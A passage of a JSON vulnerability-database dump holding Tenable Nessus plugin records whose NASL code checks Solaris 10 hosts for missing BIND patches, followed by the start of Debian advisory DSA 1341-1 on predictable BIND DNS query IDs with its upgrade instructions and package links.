pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-39\", obsoleted_by:\"\", package:\"SUNWbind\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-39\", obsoleted_by:\"\", package:\"SUNWbindS\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-39\", obsoleted_by:\"\", package:\"SUNWbindr\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWbind / SUNWbindS / SUNWbindr\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:00:37", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.", "edition": 24, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 119784-37", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0696", "CVE-2013-0415", "CVE-2007-2926"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119784", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119784-37.NASL", "href": "https://www.tenable.com/plugins/nessus/107842", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107842);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2926\", \"CVE-2009-0696\", \"CVE-2013-0415\");\n\n script_name(english:\"Solaris 10 (x86) : 119784-37\");\n script_summary(english:\"Check for patch 119784-37\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119784-37\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119784-37\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119784-37 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0415\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119784\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-37\", obsoleted_by:\"\", package:\"SUNWbind\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-37\", obsoleted_by:\"\", package:\"SUNWbindS\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-37\", obsoleted_by:\"\", package:\"SUNWbindr\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWbind / SUNWbindS / SUNWbindr\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:00:37", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.", "edition": 24, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 119784-36", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0696", "CVE-2013-0415", "CVE-2007-2926"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119784", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119784-36.NASL", "href": "https://www.tenable.com/plugins/nessus/107841", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107841);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2926\", \"CVE-2009-0696\", \"CVE-2013-0415\");\n\n script_name(english:\"Solaris 10 (x86) : 119784-36\");\n script_summary(english:\"Check for patch 119784-36\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119784-36\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119784-36\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119784-36 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0415\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119784\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-36\", obsoleted_by:\"\", package:\"SUNWbind\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-36\", obsoleted_by:\"\", package:\"SUNWbindS\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-36\", obsoleted_by:\"\", package:\"SUNWbindr\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWbind / SUNWbindS / SUNWbindr\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:00:24", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.", "edition": 24, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (sparc) : 119783-29", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0696", "CVE-2013-0415", "CVE-2007-2926"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119783", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_119783-29.NASL", "href": "https://www.tenable.com/plugins/nessus/107333", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107333);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2926\", \"CVE-2009-0696\", \"CVE-2013-0415\");\n\n script_name(english:\"Solaris 10 (sparc) : 119783-29\");\n script_summary(english:\"Check for patch 119783-29\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119783-29\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119783-29\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119783-29 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0415\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119783\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-29\", obsoleted_by:\"\", package:\"SUNWbind\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-29\", obsoleted_by:\"\", package:\"SUNWbindS\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-29\", obsoleted_by:\"\", package:\"SUNWbindr\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWbind / SUNWbindS / SUNWbindr\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:00:38", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.", "edition": 24, "published": "2018-03-12T00:00:00", "title": "Solaris 10 (x86) : 119784-40", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0696", "CVE-2013-0415", "CVE-2007-2926"], "modified": "2018-03-12T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119784", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119784-40.NASL", "href": "https://www.tenable.com/plugins/nessus/107845", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107845);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2926\", \"CVE-2009-0696\", \"CVE-2013-0415\");\n\n script_name(english:\"Solaris 10 (x86) : 119784-40\");\n script_summary(english:\"Check for patch 119784-40\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119784-40\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119784-40\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119784-40 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0415\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119784\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"i386\") audit(AUDIT_ARCH_NOT, \"i386\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-40\", obsoleted_by:\"\", package:\"SUNWbind\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-40\", obsoleted_by:\"\", package:\"SUNWbindS\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10_x86\", arch:\"i386\", patch:\"119784-40\", obsoleted_by:\"\", package:\"SUNWbindr\", version:\"11.10.0,REV=2005.01.08.01.09\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWbind / SUNWbindS / SUNWbindr\");\n}\n", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2020-11-11T13:11:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-2926"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1341-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 25th, 2007 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : bind9\nVulnerability : design error\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2007-2926\n\nAmit Klein discovered that the BIND name server generates predictable \nDNS query IDs, which may lead to cache poisoning attacks.\n\nAn update for the oldstable distribution (sarge) is in preparation. It\nwill be released soon.\n\nFor the stable distribution (etch) this problem has been fixed in\nversion 9.3.4-2etch1. An update for mips is not yet available, it will\nbe released soon.\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your BIND packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1.dsc\n Size/MD5 checksum: 758 428b3a45636c78046dbb77d9335a9973\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1.diff.gz\n Size/MD5 checksum: 287783 47a34c979ee9db072b37e2ae0ad0bdec\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4.orig.tar.gz\n Size/MD5 checksum: 4043577 198181d47c58a0a9c0265862cd5557b0\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9-doc_9.3.4-2etch1_all.deb\n Size/MD5 checksum: 186546 3ac7d54f57348ac941d5e0812ccc12f5\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 322456 dfe4b93bc4f56fd5dd0d8e2d1998ad28\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 115188 9e79109d03b06a82561bb3245d85b53c\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 188024 9df9116f4e4d87dd6d1f310506762d05\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 1407446 2c263eb7c5a053db9127f5bb4ea3e63a\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 96012 39238a7c31a2f36fcd55152cf3c3314e\n http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 566696 a5cb0c0f4e1935fd836d17baed691184\n http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 189572 8ec031302a94a02a09b0af196bd300dc\n http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 97650 0075b972a1a8893cd71c66bcaaff95d4\n http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 111912 cae6cf777332ed408fd6b122198d325f\n http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 115874 fc5f861aad1689c7aeba2f1f012324ba\n http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch1_alpha.deb\n Size/MD5 checksum: 225398 f4b2582ac5d26563becd0b83e7f054ba\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 317188 4426301631236673c7501c63d7d1be64\n http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 116584 8485c57afdaefb85a77c2cec61bb0b7b\n http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 190490 8081ccaac50c67c51e9a49804d22e2f1\n http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 1110612 dfa5a6f773e5cc985ca15b08cf868afc\n http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch1_amd64.deb\n Size/MD5 checksum: 95162 de0fd449293c68f17886b9fcf8aaf3e0\n 